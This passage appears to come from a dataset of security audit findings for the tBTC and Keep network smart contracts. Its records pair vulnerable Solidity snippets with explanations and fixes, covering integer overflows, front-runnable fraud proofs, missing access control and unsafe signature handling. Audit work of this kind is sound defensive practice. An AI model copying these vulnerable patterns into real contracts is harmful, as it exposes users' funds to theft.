pushing a deposit to active state even though a timeout should have been called on it).\\nA TDT holder can choose not to call out `notifySignerSetupFailure` hoping that the signing group still forms after the signer setup timeout passes.\\nthere is no incentive for the TDT holder to terminate its own deposit after a timeout.\\nthe deposit might end up never being in a final error state.\\nthere is no incentive for the signing group to terminate the deposit.\\nThis affects all states that can time out.\\nThe deposit can be pushed to active state even after `notifySignerSetupFailure`, `notifyFundingTimeout` have passed but nobody called it out.\\nThere is no timeout check in `retrieveSignerPubkey`, `provideBTCFundingProof`.\\n```\\n/// @notice we poll the Keep contract to retrieve our pubkey\\n/// @dev We store the pubkey as 2 bytestrings, X and Y.\\n/// @param \\_d deposit storage pointer\\n/// @return True if successful, otherwise revert\\nfunction retrieveSignerPubkey(DepositUtils.Deposit storage \\_d) public {\\n require(\\_d.inAwaitingSignerSetup(), \"Not currently awaiting signer setup\");\\n\\n bytes memory \\_publicKey = IBondedECDSAKeep(\\_d.keepAddress).getPublicKey();\\n require(\\_publicKey.length == 64, \"public key not set or not 64-bytes long\");\\n```\\n\\n```\\nfunction provideBTCFundingProof(\\n DepositUtils.Deposit storage \\_d,\\n bytes4 \\_txVersion,\\n bytes memory \\_txInputVector,\\n bytes memory \\_txOutputVector,\\n bytes4 \\_txLocktime,\\n uint8 \\_fundingOutputIndex,\\n bytes memory \\_merkleProof,\\n uint256 \\_txIndexInBlock,\\n bytes memory \\_bitcoinHeaders\\n) public returns (bool) {\\n\\n require(\\_d.inAwaitingBTCFundingProof(), \"Not awaiting funding\");\\n\\n bytes8 \\_valueBytes;\\n bytes memory \\_utxoOutpoint;\\n```\\n\\nMembers of the signing group might decide to call `notifyFraudFundingTimeout` in a race to avoid late submissions for `provideFraudBTCFundingProof` to succeed in order to contain funds lost due to fraud.\\nIt 
should be noted that even after the fraud funding timeout passed the TDT holder could `provideFraudBTCFundingProof` as it does not check for the timeout.\\nA malicious signing group observes BTC funding on the bitcoin chain in an attempt to commit fraud at the time the `provideBTCFundingProof` transition becomes available to front-run `provideFundingECDSAFraudProof` forcing the deposit into active state.\\nThe malicious users of the signing group can then try to report fraud, set themselves as `liquidationInitiator` to be awarded part of the signer bond (in addition to taking control of the BTC collateral).\\nThe TDT holders fraud-proof can be front-run, see issue 5.15\\nIf oracle price slippage occurs for one block (flash-crash type of event) someone could call an undercollateralization transition.\\nFor severe oracle errors deposits might be liquidated by calling `notifyUndercollateralizedLiquidation`. The TDT holder cannot exit liquidation in this case.\\nFor non-severe under collateralization someone could call `notifyCourtesyCall` to impose extra effort on TDT holders to `exitCourtesyCall` deposits.\\nA deposit term expiration courtesy call can be exit in the rare case where `_d.fundedAt + TBTCConstants.getDepositTerm() == block.timestamp`\\n```\\n/// @notice Goes from courtesy call to active\\n/// @dev Only callable if collateral is sufficient and the deposit is not expiring\\n/// @param \\_d deposit storage pointer\\nfunction exitCourtesyCall(DepositUtils.Deposit storage \\_d) public {\\n require(\\_d.inCourtesyCall(), \"Not currently in courtesy call\");\\n require(block.timestamp <= \\_d.fundedAt + TBTCConstants.getDepositTerm(), \"Deposit is expiring\");\\n require(getCollateralizationPercentage(\\_d) >= \\_d.undercollateralizedThresholdPercent, \"Deposit is still undercollateralized\");\\n \\_d.setActive();\\n \\_d.logExitedCourtesyCall();\\n}\\n```\\n\\n```\\n/// @notice Notifies the contract that its term limit has been reached\\n/// @dev This 
initiates a courtesy call\\n/// @param \\_d deposit storage pointer\\nfunction notifyDepositExpiryCourtesyCall(DepositUtils.Deposit storage \\_d) public {\\n require(\\_d.inActive(), \"Deposit is not active\");\\n require(block.timestamp >= \\_d.fundedAt + TBTCConstants.getDepositTerm(), \"Deposit term not elapsed\");\\n \\_d.setCourtesyCall();\\n \\_d.logCourtesyCalled();\\n \\_d.courtesyCallInitiated = block.timestamp;\\n}\\n```\\n\\nAllow exiting the courtesy call only if the deposit is not expired: `block.timestamp < _d.fundedAt + TBTCConstants.getDepositTerm()`чEnsure that there are no competing interests between participants of the system to favor one transition over the other, causing race conditions, front-running opportunities or stale deposits that are not pushed to end-states.\\nNote: Please find an analysis of incentives to call state transitions in the security section of this document.чч```\\n/// @notice we poll the Keep contract to retrieve our pubkey\\n/// @dev We store the pubkey as 2 bytestrings, X and Y.\\n/// @param \\_d deposit storage pointer\\n/// @return True if successful, otherwise revert\\nfunction retrieveSignerPubkey(DepositUtils.Deposit storage \\_d) public {\\n require(\\_d.inAwaitingSignerSetup(), \"Not currently awaiting signer setup\");\\n\\n bytes memory \\_publicKey = IBondedECDSAKeep(\\_d.keepAddress).getPublicKey();\\n require(\\_publicKey.length == 64, \"public key not set or not 64-bytes long\");\\n```\\n -tbtc - Funder loses payment to keep if signing group is not established in time PendingчhighчTo create a new deposit, the funder has to pay for the creation of a keep. If establishing the keep does not succeed in time, fails or the signing group decides not to return a public key when `retrieveSignerPubkey` is called to transition from `awaiting_signer_setup` to `awaiting_btc_funding_proof` the signer setup fails. 
After a timeout of 3 hrs, anyone can force the deposit to transition from `awaiting_signer_setup` to `failed_setup` by calling `notifySignerSetupFailure`.\\nThe funder had to provide payment for the keep but the signing group failed to establish. Payment for the keep is not returned even though one could assume that the signing group tried to play unfairly. The signing group might intentionally try to cause this scenario to interfere with the system.\\n`retrieveSignerPubkey` fails if keep provided pubkey is empty or of an unexpected length\\n```\\n/// @notice we poll the Keep contract to retrieve our pubkey\\n/// @dev We store the pubkey as 2 bytestrings, X and Y.\\n/// @param \\_d deposit storage pointer\\n/// @return True if successful, otherwise revert\\nfunction retrieveSignerPubkey(DepositUtils.Deposit storage \\_d) public {\\n require(\\_d.inAwaitingSignerSetup(), \"Not currently awaiting signer setup\");\\n\\n bytes memory \\_publicKey = IBondedECDSAKeep(\\_d.keepAddress).getPublicKey();\\n require(\\_publicKey.length == 64, \"public key not set or not 64-bytes long\");\\n\\n \\_d.signingGroupPubkeyX = \\_publicKey.slice(0, 32).toBytes32();\\n \\_d.signingGroupPubkeyY = \\_publicKey.slice(32, 32).toBytes32();\\n require(\\_d.signingGroupPubkeyY != bytes32(0) && \\_d.signingGroupPubkeyX != bytes32(0), \"Keep returned bad pubkey\");\\n \\_d.fundingProofTimerStart = block.timestamp;\\n\\n \\_d.setAwaitingBTCFundingProof();\\n \\_d.logRegisteredPubkey(\\n \\_d.signingGroupPubkeyX,\\n \\_d.signingGroupPubkeyY);\\n}\\n```\\n\\n`notifySignerSetupFailure` can be called by anyone after a timeout of 3hrs\\n```\\n/// @notice Anyone may notify the contract that signing group setup has timed out\\n/// @dev We rely on the keep system punishes the signers in this case\\n/// @param \\_d deposit storage pointer\\nfunction notifySignerSetupFailure(DepositUtils.Deposit storage \\_d) public {\\n require(\\_d.inAwaitingSignerSetup(), \"Not awaiting setup\");\\n require(\\n 
block.timestamp > \\_d.signingGroupRequestedAt + TBTCConstants.getSigningGroupFormationTimeout(),\\n \"Signing group formation timeout not yet elapsed\"\\n );\\n \\_d.setFailedSetup();\\n \\_d.logSetupFailed();\\n\\n fundingTeardown(\\_d);\\n}\\n```\\nчIt should be ensured that a keep group always establishes or otherwise the funder is refunded the fee for the keep.чч```\\n/// @notice we poll the Keep contract to retrieve our pubkey\\n/// @dev We store the pubkey as 2 bytestrings, X and Y.\\n/// @param \\_d deposit storage pointer\\n/// @return True if successful, otherwise revert\\nfunction retrieveSignerPubkey(DepositUtils.Deposit storage \\_d) public {\\n require(\\_d.inAwaitingSignerSetup(), \"Not currently awaiting signer setup\");\\n\\n bytes memory \\_publicKey = IBondedECDSAKeep(\\_d.keepAddress).getPublicKey();\\n require(\\_publicKey.length == 64, \"public key not set or not 64-bytes long\");\\n\\n \\_d.signingGroupPubkeyX = \\_publicKey.slice(0, 32).toBytes32();\\n \\_d.signingGroupPubkeyY = \\_publicKey.slice(32, 32).toBytes32();\\n require(\\_d.signingGroupPubkeyY != bytes32(0) && \\_d.signingGroupPubkeyX != bytes32(0), \"Keep returned bad pubkey\");\\n \\_d.fundingProofTimerStart = block.timestamp;\\n\\n \\_d.setAwaitingBTCFundingProof();\\n \\_d.logRegisteredPubkey(\\n \\_d.signingGroupPubkeyX,\\n \\_d.signingGroupPubkeyY);\\n}\\n```\\n -bitcoin-spv - SPV proofs do not support transactions with larger numbers of inputs and outputs PendingчhighчThere is no explicit restriction on the number of inputs and outputs a Bitcoin transaction can have - as long as the transaction fits into a block. The number of inputs and outputs in a transaction is denoted by a leading “varint” - a variable length integer. 
In `BTCUtils.validateVin` and `BTCUtils.validateVout`, the value of this varint is restricted to under `0xFD`, or 253:\\n```\\n/// @notice Checks that the vin passed up is properly formatted\\n/// @dev Consider a vin with a valid vout in its scriptsig\\n/// @param \\_vin Raw bytes length-prefixed input vector\\n/// @return True if it represents a validly formatted vin\\nfunction validateVin(bytes memory \\_vin) internal pure returns (bool) {\\n uint256 \\_offset = 1;\\n uint8 \\_nIns = uint8(\\_vin.slice(0, 1)[0]);\\n\\n // Not valid if it says there are too many or no inputs\\n if (\\_nIns >= 0xfd || \\_nIns == 0) {\\n return false;\\n }\\n```\\n\\nTransactions that include more than 252 inputs or outputs will not pass this validation, leading to some legitimate deposits being rejected by the tBTC system.\\nThe 252-item limit exists in a few forms throughout the system, outside of the aforementioned `BTCUtils.validateVin` and BTCUtils.validateVout:\\nBTCUtils.determineOutputLength:\\n```\\n/// @notice Determines the length of an output\\n/// @dev 5 types: WPKH, WSH, PKH, SH, and OP\\_RETURN\\n/// @param \\_output The output\\n/// @return The length indicated by the prefix, error if invalid length\\nfunction determineOutputLength(bytes memory \\_output) internal pure returns (uint256) {\\n uint8 \\_len = uint8(\\_output.slice(8, 1)[0]);\\n require(\\_len < 0xfd, \"Multi-byte VarInts not supported\");\\n\\n return \\_len + 8 + 1; // 8 byte value, 1 byte for \\_len itself\\n}\\n```\\n\\nDepositUtils.findAndParseFundingOutput:\\n```\\nfunction findAndParseFundingOutput(\\n DepositUtils.Deposit storage \\_d,\\n bytes memory \\_txOutputVector,\\n uint8 \\_fundingOutputIndex\\n) public view returns (bytes8) {\\n```\\n\\nDepositUtils.validateAndParseFundingSPVProof:\\n```\\nfunction validateAndParseFundingSPVProof(\\n DepositUtils.Deposit storage \\_d,\\n bytes4 \\_txVersion,\\n bytes memory \\_txInputVector,\\n bytes memory \\_txOutputVector,\\n bytes4 \\_txLocktime,\\n 
uint8 \\_fundingOutputIndex,\\n bytes memory \\_merkleProof,\\n uint256 \\_txIndexInBlock,\\n bytes memory \\_bitcoinHeaders\\n) public view returns (bytes8 \\_valueBytes, bytes memory \\_utxoOutpoint){\\n```\\n\\nDepositFunding.provideFraudBTCFundingProof:\\n```\\nfunction provideFraudBTCFundingProof(\\n DepositUtils.Deposit storage \\_d,\\n bytes4 \\_txVersion,\\n bytes memory \\_txInputVector,\\n bytes memory \\_txOutputVector,\\n bytes4 \\_txLocktime,\\n uint8 \\_fundingOutputIndex,\\n bytes memory \\_merkleProof,\\n uint256 \\_txIndexInBlock,\\n bytes memory \\_bitcoinHeaders\\n) public returns (bool) {\\n```\\n\\nDepositFunding.provideBTCFundingProof:\\n```\\nfunction provideBTCFundingProof(\\n DepositUtils.Deposit storage \\_d,\\n bytes4 \\_txVersion,\\n bytes memory \\_txInputVector,\\n bytes memory \\_txOutputVector,\\n bytes4 \\_txLocktime,\\n uint8 \\_fundingOutputIndex,\\n bytes memory \\_merkleProof,\\n uint256 \\_txIndexInBlock,\\n bytes memory \\_bitcoinHeaders\\n) public returns (bool) {\\n```\\n\\nDepositLiquidation.provideSPVFraudProof:\\n```\\nfunction provideSPVFraudProof(\\n DepositUtils.Deposit storage \\_d,\\n bytes4 \\_txVersion,\\n bytes memory \\_txInputVector,\\n bytes memory \\_txOutputVector,\\n bytes4 \\_txLocktime,\\n bytes memory \\_merkleProof,\\n uint256 \\_txIndexInBlock,\\n uint8 \\_targetInputIndex,\\n bytes memory \\_bitcoinHeaders\\n) public {\\n```\\nчResolution\\nThe client provided the following statement:\\nBenchmarks and takeaways are being tracked in issue https://github.com/keep-network/tbtc/issues/556.\\nIncorporate varint parsing in `BTCUtils.validateVin` and `BTCUtils.validateVout`. 
Ensure that other components of the system reflect the removal of the 252-item limit.чч```\\n/// @notice Checks that the vin passed up is properly formatted\\n/// @dev Consider a vin with a valid vout in its scriptsig\\n/// @param \\_vin Raw bytes length-prefixed input vector\\n/// @return True if it represents a validly formatted vin\\nfunction validateVin(bytes memory \\_vin) internal pure returns (bool) {\\n uint256 \\_offset = 1;\\n uint8 \\_nIns = uint8(\\_vin.slice(0, 1)[0]);\\n\\n // Not valid if it says there are too many or no inputs\\n if (\\_nIns >= 0xfd || \\_nIns == 0) {\\n return false;\\n }\\n```\\n -bitcoin-spv - multiple integer under-/overflowsчhighчThe bitcoin-spv library allows for multiple integer under-/overflows while processing or converting potentially untrusted or user-provided data.\\n`uint8` underflow `uint256(uint8(_e - 3))`\\nNote: `_header[75]` will throw consuming all gas if out of bounds while the majority of the library usually uses `slice(start, 1)` to handle this more gracefully.\\n```\\n/// @dev Target is a 256 bit number encoded as a 3-byte mantissa and 1 byte exponent\\n/// @param \\_header The header\\n/// @return The target threshold\\nfunction extractTarget(bytes memory \\_header) internal pure returns (uint256) {\\n bytes memory \\_m = \\_header.slice(72, 3);\\n uint8 \\_e = uint8(\\_header[75]);\\n uint256 \\_mantissa = bytesToUint(reverseEndianness(\\_m));\\n uint \\_exponent = \\_e - 3;\\n\\n return \\_mantissa \\* (256 \\*\\* \\_exponent);\\n}\\n```\\n\\n`uint8` overflow `uint256(uint8(_len + 8 + 1))`\\nNote: might allow a specially crafted output to return an invalid determineOutputLength <= 9.\\nNote: while type `VarInt` is implemented for inputs, it is not for the output length.\\n```\\n/// @dev 5 types: WPKH, WSH, PKH, SH, and OP\\_RETURN\\n/// @param \\_output The output\\n/// @return The length indicated by the prefix, error if invalid length\\nfunction determineOutputLength(bytes memory \\_output) internal pure 
returns (uint256) {\\n uint8 \\_len = uint8(\\_output.slice(8, 1)[0]);\\n require(\\_len < 0xfd, \"Multi-byte VarInts not supported\");\\n\\n return \\_len + 8 + 1; // 8 byte value, 1 byte for \\_len itself\\n}\\n```\\n\\n`uint8` underflow `uint256(uint8(extractOutputScriptLen(_output)[0]) - 2)`\\n```\\n/// @dev Determines type by the length prefix and validates format\\n/// @param \\_output The output\\n/// @return The hash committed to by the pk\\_script, or null for errors\\nfunction extractHash(bytes memory \\_output) internal pure returns (bytes memory) {\\n if (uint8(\\_output.slice(9, 1)[0]) == 0) {\\n uint256 \\_len = uint8(extractOutputScriptLen(\\_output)[0]) - 2;\\n // Check for maliciously formatted witness outputs\\n if (uint8(\\_output.slice(10, 1)[0]) != uint8(\\_len)) {\\n return hex\"\";\\n }\\n return \\_output.slice(11, \\_len);\\n } else {\\n bytes32 \\_tag = \\_output.keccak256Slice(8, 3);\\n```\\n\\n`BytesLib` input validation multiple start+length overflow\\nNote: multiple occurrences. 
should check `start+length > start && bytes.length >= start+length`\\n```\\nfunction slice(bytes memory \\_bytes, uint \\_start, uint \\_length) internal pure returns (bytes memory res) {\\n require(\\_bytes.length >= (\\_start + \\_length), \"Slice out of bounds\");\\n```\\n\\n`BytesLib` input validation multiple start overflow\\n```\\nfunction toUint(bytes memory \\_bytes, uint \\_start) internal pure returns (uint256) {\\n require(\\_bytes.length >= (\\_start + 32), \"Uint conversion out of bounds.\");\\n```\\n\\n```\\nfunction toAddress(bytes memory \\_bytes, uint \\_start) internal pure returns (address) {\\n require(\\_bytes.length >= (\\_start + 20), \"Address conversion out of bounds.\");\\n```\\n\\n```\\nfunction slice(bytes memory \\_bytes, uint \\_start, uint \\_length) internal pure returns (bytes memory res) {\\n require(\\_bytes.length >= (\\_start + \\_length), \"Slice out of bounds\");\\n```\\n\\n```\\nfunction keccak256Slice(bytes memory \\_bytes, uint \\_start, uint \\_length) pure internal returns (bytes32 result) {\\n require(\\_bytes.length >= (\\_start + \\_length), \"Slice out of bounds\");\\n```\\nчWe believe that a general-purpose parsing and verification library for bitcoin payments should be very strict when processing untrusted user input. With strict we mean, that it should rigorously validate provided input data and only proceed with the processing of the data if it is within a safe-to-use range for the method to return valid results. 
Relying on the caller to provide pre-validate data can be unsafe especially if the caller assumes that proper input validation is performed by the library.\\nGiven the risk profile for this library, we recommend a conservative approach that balances security instead of gas efficiency without relying on certain calls or instructions to throw on invalid input.\\nFor this issue specifically, we recommend proper input validation and explicit type expansion where necessary to prevent values from wrapping or processing data for arguments that are not within a safe-to-use range.чч```\\n/// @dev Target is a 256 bit number encoded as a 3-byte mantissa and 1 byte exponent\\n/// @param \\_header The header\\n/// @return The target threshold\\nfunction extractTarget(bytes memory \\_header) internal pure returns (uint256) {\\n bytes memory \\_m = \\_header.slice(72, 3);\\n uint8 \\_e = uint8(\\_header[75]);\\n uint256 \\_mantissa = bytesToUint(reverseEndianness(\\_m));\\n uint \\_exponent = \\_e - 3;\\n\\n return \\_mantissa \\* (256 \\*\\* \\_exponent);\\n}\\n```\\n -tbtc - Unreachable state LIQUIDATION_IN_PROGRESSчhighчAccording to the specification (overview, states, version 2020-02-06), a deposit can be in one of two liquidation_in_progress states.\\nLIQUIDATION_IN_PROGRESS\\nLIQUIDATION_IN_PROGRESS Liquidation due to undercollateralization or an abort has started Automatic (on-chain) liquidation was unsuccessful\\nFRAUD_LIQUIDATION_IN_PROGRESS\\nFRAUD_LIQUIDATION_IN_PROGRESS Liquidation due to fraud has started Automatic (on-chain) liquidation was unsuccessful\\nHowever, `LIQUIDATION_IN_PROGRESS` is unreachable and instead, `FRAUD_LIQUIDATION_IN_PROGRESS` is always called. 
This means that all non-fraud state transitions end up in the fraud liquidation path and will perform actions as if fraud was detected even though it might be caused by an undercollateralized notification or courtesy timeout.\\n`startSignerAbortLiquidation` transitions to `FRAUD_LIQUIDATION_IN_PROGRESS` on non-fraud events `notifyUndercollateralizedLiquidation` and `notifyCourtesyTimeout`\\n```\\n/// @notice Starts signer liquidation due to abort or undercollateralization\\n/// @dev We first attempt to liquidate on chain, then by auction\\n/// @param \\_d deposit storage pointer\\nfunction startSignerAbortLiquidation(DepositUtils.Deposit storage \\_d) internal {\\n \\_d.logStartedLiquidation(false);\\n // Reclaim used state for gas savings\\n \\_d.redemptionTeardown();\\n \\_d.seizeSignerBonds();\\n\\n \\_d.liquidationInitiated = block.timestamp; // Store the timestamp for auction\\n \\_d.liquidationInitiator = msg.sender;\\n \\_d.setFraudLiquidationInProgress();\\n}\\n```\\nчVerify state transitions and either remove `LIQUIDATION_IN_PROGRESS` if it is redundant or fix the state transitions for non-fraud liquidations.\\nNote that Deposit states can be simplified by removing redundant states by setting a flag (e.g. 
fraudLiquidation) in the deposit instead of adding a state to track the fraud liquidation path.\\nAccording to the specification, we assume the following state transitions are desired:\\n`LIQUIDATION_IN_PROGRESS`\\nIn case of liquidation due to undercollateralization or abort, the remaining bond value is split 50-50 between the account which triggered the liquidation and the signers.\\n`FRAUD_LIQUIDATION_IN_PROGRESS`\\nIn case of liquidation due to fraud, the remaining bond value in full goes to the account which triggered the liquidation by proving fraud.чч```\\n/// @notice Starts signer liquidation due to abort or undercollateralization\\n/// @dev We first attempt to liquidate on chain, then by auction\\n/// @param \\_d deposit storage pointer\\nfunction startSignerAbortLiquidation(DepositUtils.Deposit storage \\_d) internal {\\n \\_d.logStartedLiquidation(false);\\n // Reclaim used state for gas savings\\n \\_d.redemptionTeardown();\\n \\_d.seizeSignerBonds();\\n\\n \\_d.liquidationInitiated = block.timestamp; // Store the timestamp for auction\\n \\_d.liquidationInitiator = msg.sender;\\n \\_d.setFraudLiquidationInProgress();\\n}\\n```\\n -tbtc - various deposit state transitions can be front-run (e.g. 
fraud proofs, timeouts) Won't FixчhighчAn entity that can provide proof for fraudulent ECDSA signatures or SPV proofs in the liquidation flow is rewarded with part of the deposit contract ETH value.\\nSpecification: Liquidation Any signer bond left over after the deposit owner is compensated is distributed to the account responsible for reporting the misbehavior (for fraud) or between the signers and the account that triggered liquidation (for collateralization issues).\\nHowever, the methods under which proof is provided are not protected from front-running allowing anyone to observe transactions to provideECDSAFraudProof/ `provideSPVFraudProof` and submit the same proofs with providing a higher gas value.\\nPlease note that a similar issue exists for timeout states providing rewards for calling them out (i.e. they set the `liquidationInitiator` address).\\n`provideECDSAFraudProof` verifies the fraudulent proof\\n`r,s,v,signedDigest` appear to be the fraudulent signature. `_preimage` is the correct value.\\n```\\n/// @param \\_preimage The sha256 preimage of the digest\\nfunction provideECDSAFraudProof(\\n DepositUtils.Deposit storage \\_d,\\n uint8 \\_v,\\n bytes32 \\_r,\\n bytes32 \\_s,\\n bytes32 \\_signedDigest,\\n bytes memory \\_preimage\\n) public {\\n require(\\n !\\_d.inFunding() && !\\_d.inFundingFailure(),\\n \"Use provideFundingECDSAFraudProof instead\"\\n );\\n require(\\n !\\_d.inSignerLiquidation(),\\n \"Signer liquidation already in progress\"\\n );\\n require(!\\_d.inEndState(), \"Contract has halted\");\\n require(submitSignatureFraud(\\_d, \\_v, \\_r, \\_s, \\_signedDigest, \\_preimage), \"Signature is not fraud\");\\n startSignerFraudLiquidation(\\_d);\\n}\\n```\\n\\n`startSignerFraudLiquidation` sets the address that provides the proof as the beneficiary\\n```\\nfunction provideFundingECDSAFraudProof(\\n DepositUtils.Deposit storage \\_d,\\n uint8 \\_v,\\n bytes32 \\_r,\\n bytes32 \\_s,\\n bytes32 \\_signedDigest,\\n bytes memory 
\\_preimage\\n) public {\\n require(\\n \\_d.inAwaitingBTCFundingProof(),\\n \"Signer fraud during funding flow only available while awaiting funding\"\\n );\\n\\n bool \\_isFraud = \\_d.submitSignatureFraud(\\_v, \\_r, \\_s, \\_signedDigest, \\_preimage);\\n require(\\_isFraud, \"Signature is not fraudulent\");\\n \\_d.logFraudDuringSetup();\\n\\n // If the funding timeout has elapsed, punish the funder too!\\n if (block.timestamp > \\_d.fundingProofTimerStart + TBTCConstants.getFundingTimeout()) {\\n address(0).transfer(address(this).balance); // Burn it all down (fire emoji)\\n \\_d.setFailedSetup();\\n } else {\\n /\\* NB: This is reuse of the variable \\*/\\n \\_d.fundingProofTimerStart = block.timestamp;\\n \\_d.setFraudAwaitingBTCFundingProof();\\n }\\n}\\n```\\n\\n`purchaseSignerBondsAtAuction` pays out the funds\\n```\\n uint256 contractEthBalance = address(this).balance;\\n address payable initiator = \\_d.liquidationInitiator;\\n\\n if (initiator == address(0)){\\n initiator = address(0xdead);\\n }\\n if (contractEthBalance > 1) {\\n if (\\_wasFraud) {\\n initiator.transfer(contractEthBalance);\\n } else {\\n // There will always be a liquidation initiator.\\n uint256 split = contractEthBalance.div(2);\\n \\_d.pushFundsToKeepGroup(split);\\n initiator.transfer(split);\\n }\\n }\\n}\\n```\\nчFor fraud proofs, it should be required that the reporter uses a commit/reveal scheme to lock in a proof in one block, and reveal the details in another.чч```\\n/// @param \\_preimage The sha256 preimage of the digest\\nfunction provideECDSAFraudProof(\\n DepositUtils.Deposit storage \\_d,\\n uint8 \\_v,\\n bytes32 \\_r,\\n bytes32 \\_s,\\n bytes32 \\_signedDigest,\\n bytes memory \\_preimage\\n) public {\\n require(\\n !\\_d.inFunding() && !\\_d.inFundingFailure(),\\n \"Use provideFundingECDSAFraudProof instead\"\\n );\\n require(\\n !\\_d.inSignerLiquidation(),\\n \"Signer liquidation already in progress\"\\n );\\n require(!\\_d.inEndState(), \"Contract has 
halted\");\\n require(submitSignatureFraud(\\_d, \\_v, \\_r, \\_s, \\_signedDigest, \\_preimage), \"Signature is not fraud\");\\n startSignerFraudLiquidation(\\_d);\\n}\\n```\\n -tbtc - Anyone can emit log events due to missing access controlчhighчAccess control for `DepositLog` is not implemented. `DepositLog` is inherited by `TBTCSystem` and its functionality is usually consumed by `Deposit` contracts to emit log events on `TBTCSystem`. Due to the missing access control, anyone can emit log events on `TBTCSystem`. Users, client-software or other components that rely on these events might be tricked into performing actions that were not authorized by the system.\\n```\\nfunction approvedToLog(address \\_caller) public pure returns (bool) {\\n /\\* TODO: auth via system \\*/\\n \\_caller;\\n return true;\\n}\\n```\\nчLog events are typically initiated by the Deposit contract. Make sure only Deposit contracts deployed by an approved factory can emit logs on TBTCSystem.чч```\\nfunction approvedToLog(address \\_caller) public pure returns (bool) {\\n /\\* TODO: auth via system \\*/\\n \\_caller;\\n return true;\\n}\\n```\\n -DKGResultVerification.verify unsafe packing in signed dataчmediumч`DKGResultVerification.verify` allows the sender to arbitrarily move bytes between `groupPubKey` and misbehaved:\\n```\\nbytes32 resultHash = keccak256(abi.encodePacked(groupPubKey, misbehaved));\\n```\\nчValidate the expected length of both and add a salt between the two.чч```\\nbytes32 resultHash = keccak256(abi.encodePacked(groupPubKey, misbehaved));\\n```\\n -keep-core - Service contract callbacks can be abused to call into other contractsчmediumч`KeepRandomBeaconServiceImplV1` allows senders to specify an arbitrary method and contract that will receive a callback once the beacon generates a relay entry:\\n```\\n/\\*\\*\\n \\* @dev Creates a request to generate a new relay entry, which will include\\n \\* a random number (by signing the previous entry's random number).\\n \\* 
@param callbackContract Callback contract address. Callback is called once a new relay entry has been generated.\\n \\* @param callbackMethod Callback contract method signature. String representation of your method with a single\\n \\* uint256 input parameter i.e. \"relayEntryCallback(uint256)\".\\n \\* @param callbackGas Gas required for the callback.\\n \\* The customer needs to ensure they provide a sufficient callback gas\\n \\* to cover the gas fee of executing the callback. Any surplus is returned\\n \\* to the customer. If the callback gas amount turns to be not enough to\\n \\* execute the callback, callback execution is skipped.\\n \\* @return An uint256 representing uniquely generated relay request ID. It is also returned as part of the event.\\n \\*/\\nfunction requestRelayEntry(\\n address callbackContract,\\n string memory callbackMethod,\\n uint256 callbackGas\\n) public nonReentrant payable returns (uint256) {\\n```\\n\\nOnce an operator contract receives the relay entry, it calls executeCallback:\\n```\\n/\\*\\*\\n \\* @dev Executes customer specified callback for the relay entry request.\\n \\* @param requestId Request id tracked internally by this contract.\\n \\* @param entry The generated random number.\\n \\* @return Address to receive callback surplus.\\n \\*/\\nfunction executeCallback(uint256 requestId, uint256 entry) public returns (address payable surplusRecipient) {\\n require(\\n \\_operatorContracts.contains(msg.sender),\\n \"Only authorized operator contract can call execute callback.\"\\n );\\n\\n require(\\n \\_callbacks[requestId].callbackContract != address(0),\\n \"Callback contract not found\"\\n );\\n\\n \\_callbacks[requestId].callbackContract.call(abi.encodeWithSignature(\\_callbacks[requestId].callbackMethod, entry));\\n\\n surplusRecipient = \\_callbacks[requestId].surplusRecipient;\\n delete \\_callbacks[requestId];\\n}\\n```\\n\\nArbitrary callbacks can be used to force the service contract to execute many functions within 
the keep contract system. Currently, the `KeepRandomBeaconOperator` includes an `onlyServiceContract` modifier:\\n```\\n/\\*\\*\\n \\* @dev Checks if sender is authorized.\\n \\*/\\nmodifier onlyServiceContract() {\\n require(\\n serviceContracts.contains(msg.sender),\\n \"Caller is not an authorized contract\"\\n );\\n \\_;\\n}\\n```\\n\\nThe functions it protects cannot be targeted by the aforementioned service contract callbacks due to Solidity's `CALLDATASIZE` checking. However, the presence of the modifier suggests that the service contract is expected to be a permissioned actor within some contracts.чStick to a constant callback method signature, rather than allowing users to submit an arbitrary string. An example is `__beaconCallback__(uint256)`.\\nConsider disallowing arbitrary callback destinations. Instead, rely on contracts making requests directly, and default the callback destination to `msg.sender`. Ensure the sender is not an EOA.чч```\\n/\\*\\*\\n \\* @dev Creates a request to generate a new relay entry, which will include\\n \\* a random number (by signing the previous entry's random number).\\n \\* @param callbackContract Callback contract address. Callback is called once a new relay entry has been generated.\\n \\* @param callbackMethod Callback contract method signature. String representation of your method with a single\\n \\* uint256 input parameter i.e. \"relayEntryCallback(uint256)\".\\n \\* @param callbackGas Gas required for the callback.\\n \\* The customer needs to ensure they provide a sufficient callback gas\\n \\* to cover the gas fee of executing the callback. Any surplus is returned\\n \\* to the customer. If the callback gas amount turns to be not enough to\\n \\* execute the callback, callback execution is skipped.\\n \\* @return An uint256 representing uniquely generated relay request ID. 
It is also returned as part of the event.\\n \\*/\\nfunction requestRelayEntry(\\n address callbackContract,\\n string memory callbackMethod,\\n uint256 callbackGas\\n) public nonReentrant payable returns (uint256) {\\n```\\n -tbtc - Disallow signatures with high-s values in DepositRedemption.provideRedemptionSignatureчmediumч`DepositRedemption.provideRedemptionSignature` is used by signers to publish a signature that can be used to redeem a deposit on Bitcoin. The function accepts a signature s value in the upper half of the secp256k1 curve:\\n```\\nfunction provideRedemptionSignature(\\n DepositUtils.Deposit storage \\_d,\\n uint8 \\_v,\\n bytes32 \\_r,\\n bytes32 \\_s\\n) public {\\n require(\\_d.inAwaitingWithdrawalSignature(), \"Not currently awaiting a signature\");\\n\\n // If we're outside of the signature window, we COULD punish signers here\\n // Instead, we consider this a no-harm-no-foul situation.\\n // The signers have not stolen funds. Most likely they've just inconvenienced someone\\n\\n // The signature must be valid on the pubkey\\n require(\\n \\_d.signerPubkey().checkSig(\\n \\_d.lastRequestedDigest,\\n \\_v, \\_r, \\_s\\n ),\\n \"Invalid signature\"\\n );\\n```\\n\\nAlthough `ecrecover` accepts signatures with these s values, they are no longer used in Bitcoin. As such, the signature will appear to be valid to the Ethereum smart contract, but will likely not be accepted on Bitcoin. 
